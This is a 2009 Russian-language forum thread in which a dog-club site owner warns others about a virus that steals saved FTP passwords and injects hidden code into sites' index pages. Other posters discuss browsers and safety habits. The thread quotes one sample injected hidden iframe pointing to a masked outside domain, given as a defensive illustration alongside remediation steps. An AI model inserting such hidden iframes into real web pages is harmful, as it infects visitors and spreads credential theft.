Страница 1 из 3

Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 11:33 am
Бондарьков Е. В.
Сегодня ночью главная страница сайта КЦ "Ясеневый" www.yasenevo-dog.ru была заражена вирусом. Я уже все исправил. Это не первый подобный случай, с которым я сталкиваюсь.
Уважаемые владельцы сайтов, будьте осторожны! Не сохраняйте пароли от FTP на компьютерах! Вирус действует следующим образом. Если вы заходите на зараженный сайт (НЕ ХОДИТЕ ПО НЕИЗВЕСТНЫМ ССЫЛКАМ), на ваш компьютер попадает вирус, который собирает сохраненные на компьютере пароли от сайтов и отправляет их своему владельцу. Потом по сайтам ходит бот, который вставляет в HTML-код (как правило главных страниц) дескрипторы (теги) <iframe> и <script> содержащие ссылки на вирус.

PS Варвара, что с Dogschool?

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 11:41 am
kinolog
Женя, расскажи подробно, каким образом действует эта зараза и чего точно не нужно никогда делать?

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 11:50 am
Бондарьков Е. В.
Вот что писали мне специалисты, когда я в прошлый раз столкнулся с такой проблемой.
В тот раз, вероятно, по неизвестной ссылке зашел ребенок, которого мама по неосмотрительности пускала за компьютер, с которого работала по FTP, и на котором был сохранен пароль. Пароль от того сайта был и у меня.

Происходит это следующим образом:

* вирус попадает на компьютер, на котором хранятся логины и пароли
доступа по FTP на какие-либо серверы. Чаще всего это происходит при
заходе на уже зараженный сайт уязвимой версией Internet Explorer.
* вирус собирает логины/пароли и отсылает их на сервер,
контролируемый взломщиками, с которого потом робот заходит на сайты по
FTP и вставляет вирусный код во все файлы index.php и index.html,
которые найдет. Как правило, этот код содержит HTML тег <iframe> или
реализован через JavaScript. Пример: <iframe
src='http://xxxxxxxxx.info' width='1' height='1' style='visibility:
hidden;'></iframe>

Что в этой ситуации делать:

1. удалить вирусы со всех компьютеров, на которых хранятся логины на FTP
2. установить все доступные "заплатки" для вашей версии браузера
3. поменять пароли на FTP, по возможности вообще не запоминать их в
настройках FTP-клиентов
4. восстановить все поврежденные индексные файлы index.php,
index.html, index.htm и т.п. Возможно, заражены не только они, надо
проверить и остальные тоже. Учтите, что пока не выполнены действия из
пп. 1-3, проблема не исчезнет, сайт будет заражаться снова и снова. Если
был поврежден контент сайта, обращайтесь в службу технической поддержки
для развертывания резервной копии.

Зараженных сайтов много во всем интернете, поэтому при работе с
браузерами, содержащими уязвимости, заражение практически гарантировано.

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 12:08 pm
kinolog
Хорошо, а какие рекомендации по использованию браузеров? Неужели IE такой легко проникаемый. И что можете порекомендовать использовать в связи с этим.

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 12:16 pm
Бондарьков Е. В.
Не возьмусь давать советы, но приведу статистику по посетителям сайта КЦ "Ясеневый" за последний месяц:

Microsoft Internet Explorer 7.xx - 31,2%
Microsoft Internet Explorer 6.xx - 29,5%
FireFox 3.xx - 18,0%
Opera 9.xx - 14,6%
FireFox 2.xx - 4,1%
FireFox 1.xx - 0,7%
Mozilla 1.xx - 0,7%
Chrome 1.xx - 0,4%
Opera 8.xx - 0,4%
Safari 3.xx - 0,4%

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 12:20 pm
kinolog
На самом деле IE очень популярный браузер. Это бесспорно.
Microsoft регулярно выпускает заплатки. Надо вовремя делать обновления и пользоваться антивирусными системами..

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 12:23 pm
Бондарьков Е. В.
kinolog писал(а):На самом деле IE очень популярный браузер. Это бесспорно.


Вот поэтому вирусы пишут именно под него ]:->

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 12:55 pm
XPOHABT
А где в списке MyIE2 ???
На всякий случай - это прадедушка Maxthon'a

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 4:40 pm
TrP
Первый раз слышу чтоб администраторы ходили на фтп сайтов через иё подобные браузеры да и просто браузеры ) Юзайте фтп клиенты, а если ходите на вьёб админки с иё и т.д. то не надо сохранять пароли в кеше.

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 9:07 pm
Бондарьков Е. В.
Через браузеры ходят не на FTP, а на зараженные сайты, где подхватывают вирусы, собирающие пароли с FTP-клиентов.

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пт янв 23, 2009 9:32 pm
kinolog
Интересно, а в течение которого времени этот процесс происходит.
То есть, если я зашел на зараженный сайт, то СРАЗУ надо СУШИТЬ ВЕСЛА или есть шанс, что всё может обойтись, и антивирусник справиться?

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пн янв 26, 2009 12:26 pm
TrP
kinolog писал(а):Интересно, а в течение которого времени этот процесс происходит.
То есть, если я зашел на зараженный сайт, то СРАЗУ надо СУШИТЬ ВЕСЛА или есть шанс, что всё может обойтись, и антивирусник справиться?

Смотря какой антивирусник =))) и ваще чтоб не цеплять всякое Г по незнакомым зонам инета ходите осторожнее Не надо жать на всякие левые банеры и ходить по ссылкам которые вам кидает хз кто в асю или чат, даже если ссылку вам кинул друг в асю переспросите он ли её кинул, возможно ссылки рассылает бот после взлома аси вашего друга, не открывайте и не запускайте файлы не знакомые вам Будте бдительны и никакие вирусы вам не страшны. И не забывайте обновлять вирусные базы ваших антивирусников.

И если вы используете машину для админства не надо допускать к этим машинам детей ))) парольте все к чертовой бабушке

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пн янв 26, 2009 12:39 pm
kinolog
Спасибо за разъяснения.

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пн янв 26, 2009 9:09 pm
maeglin
nod32 у меня эту тварь не нашел, аваст вроде бы нашел. Посмотрим...

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Добавлено: Пн янв 26, 2009 9:16 pm
kinolog
maeglin
Твой сайт заработал. Ура!!!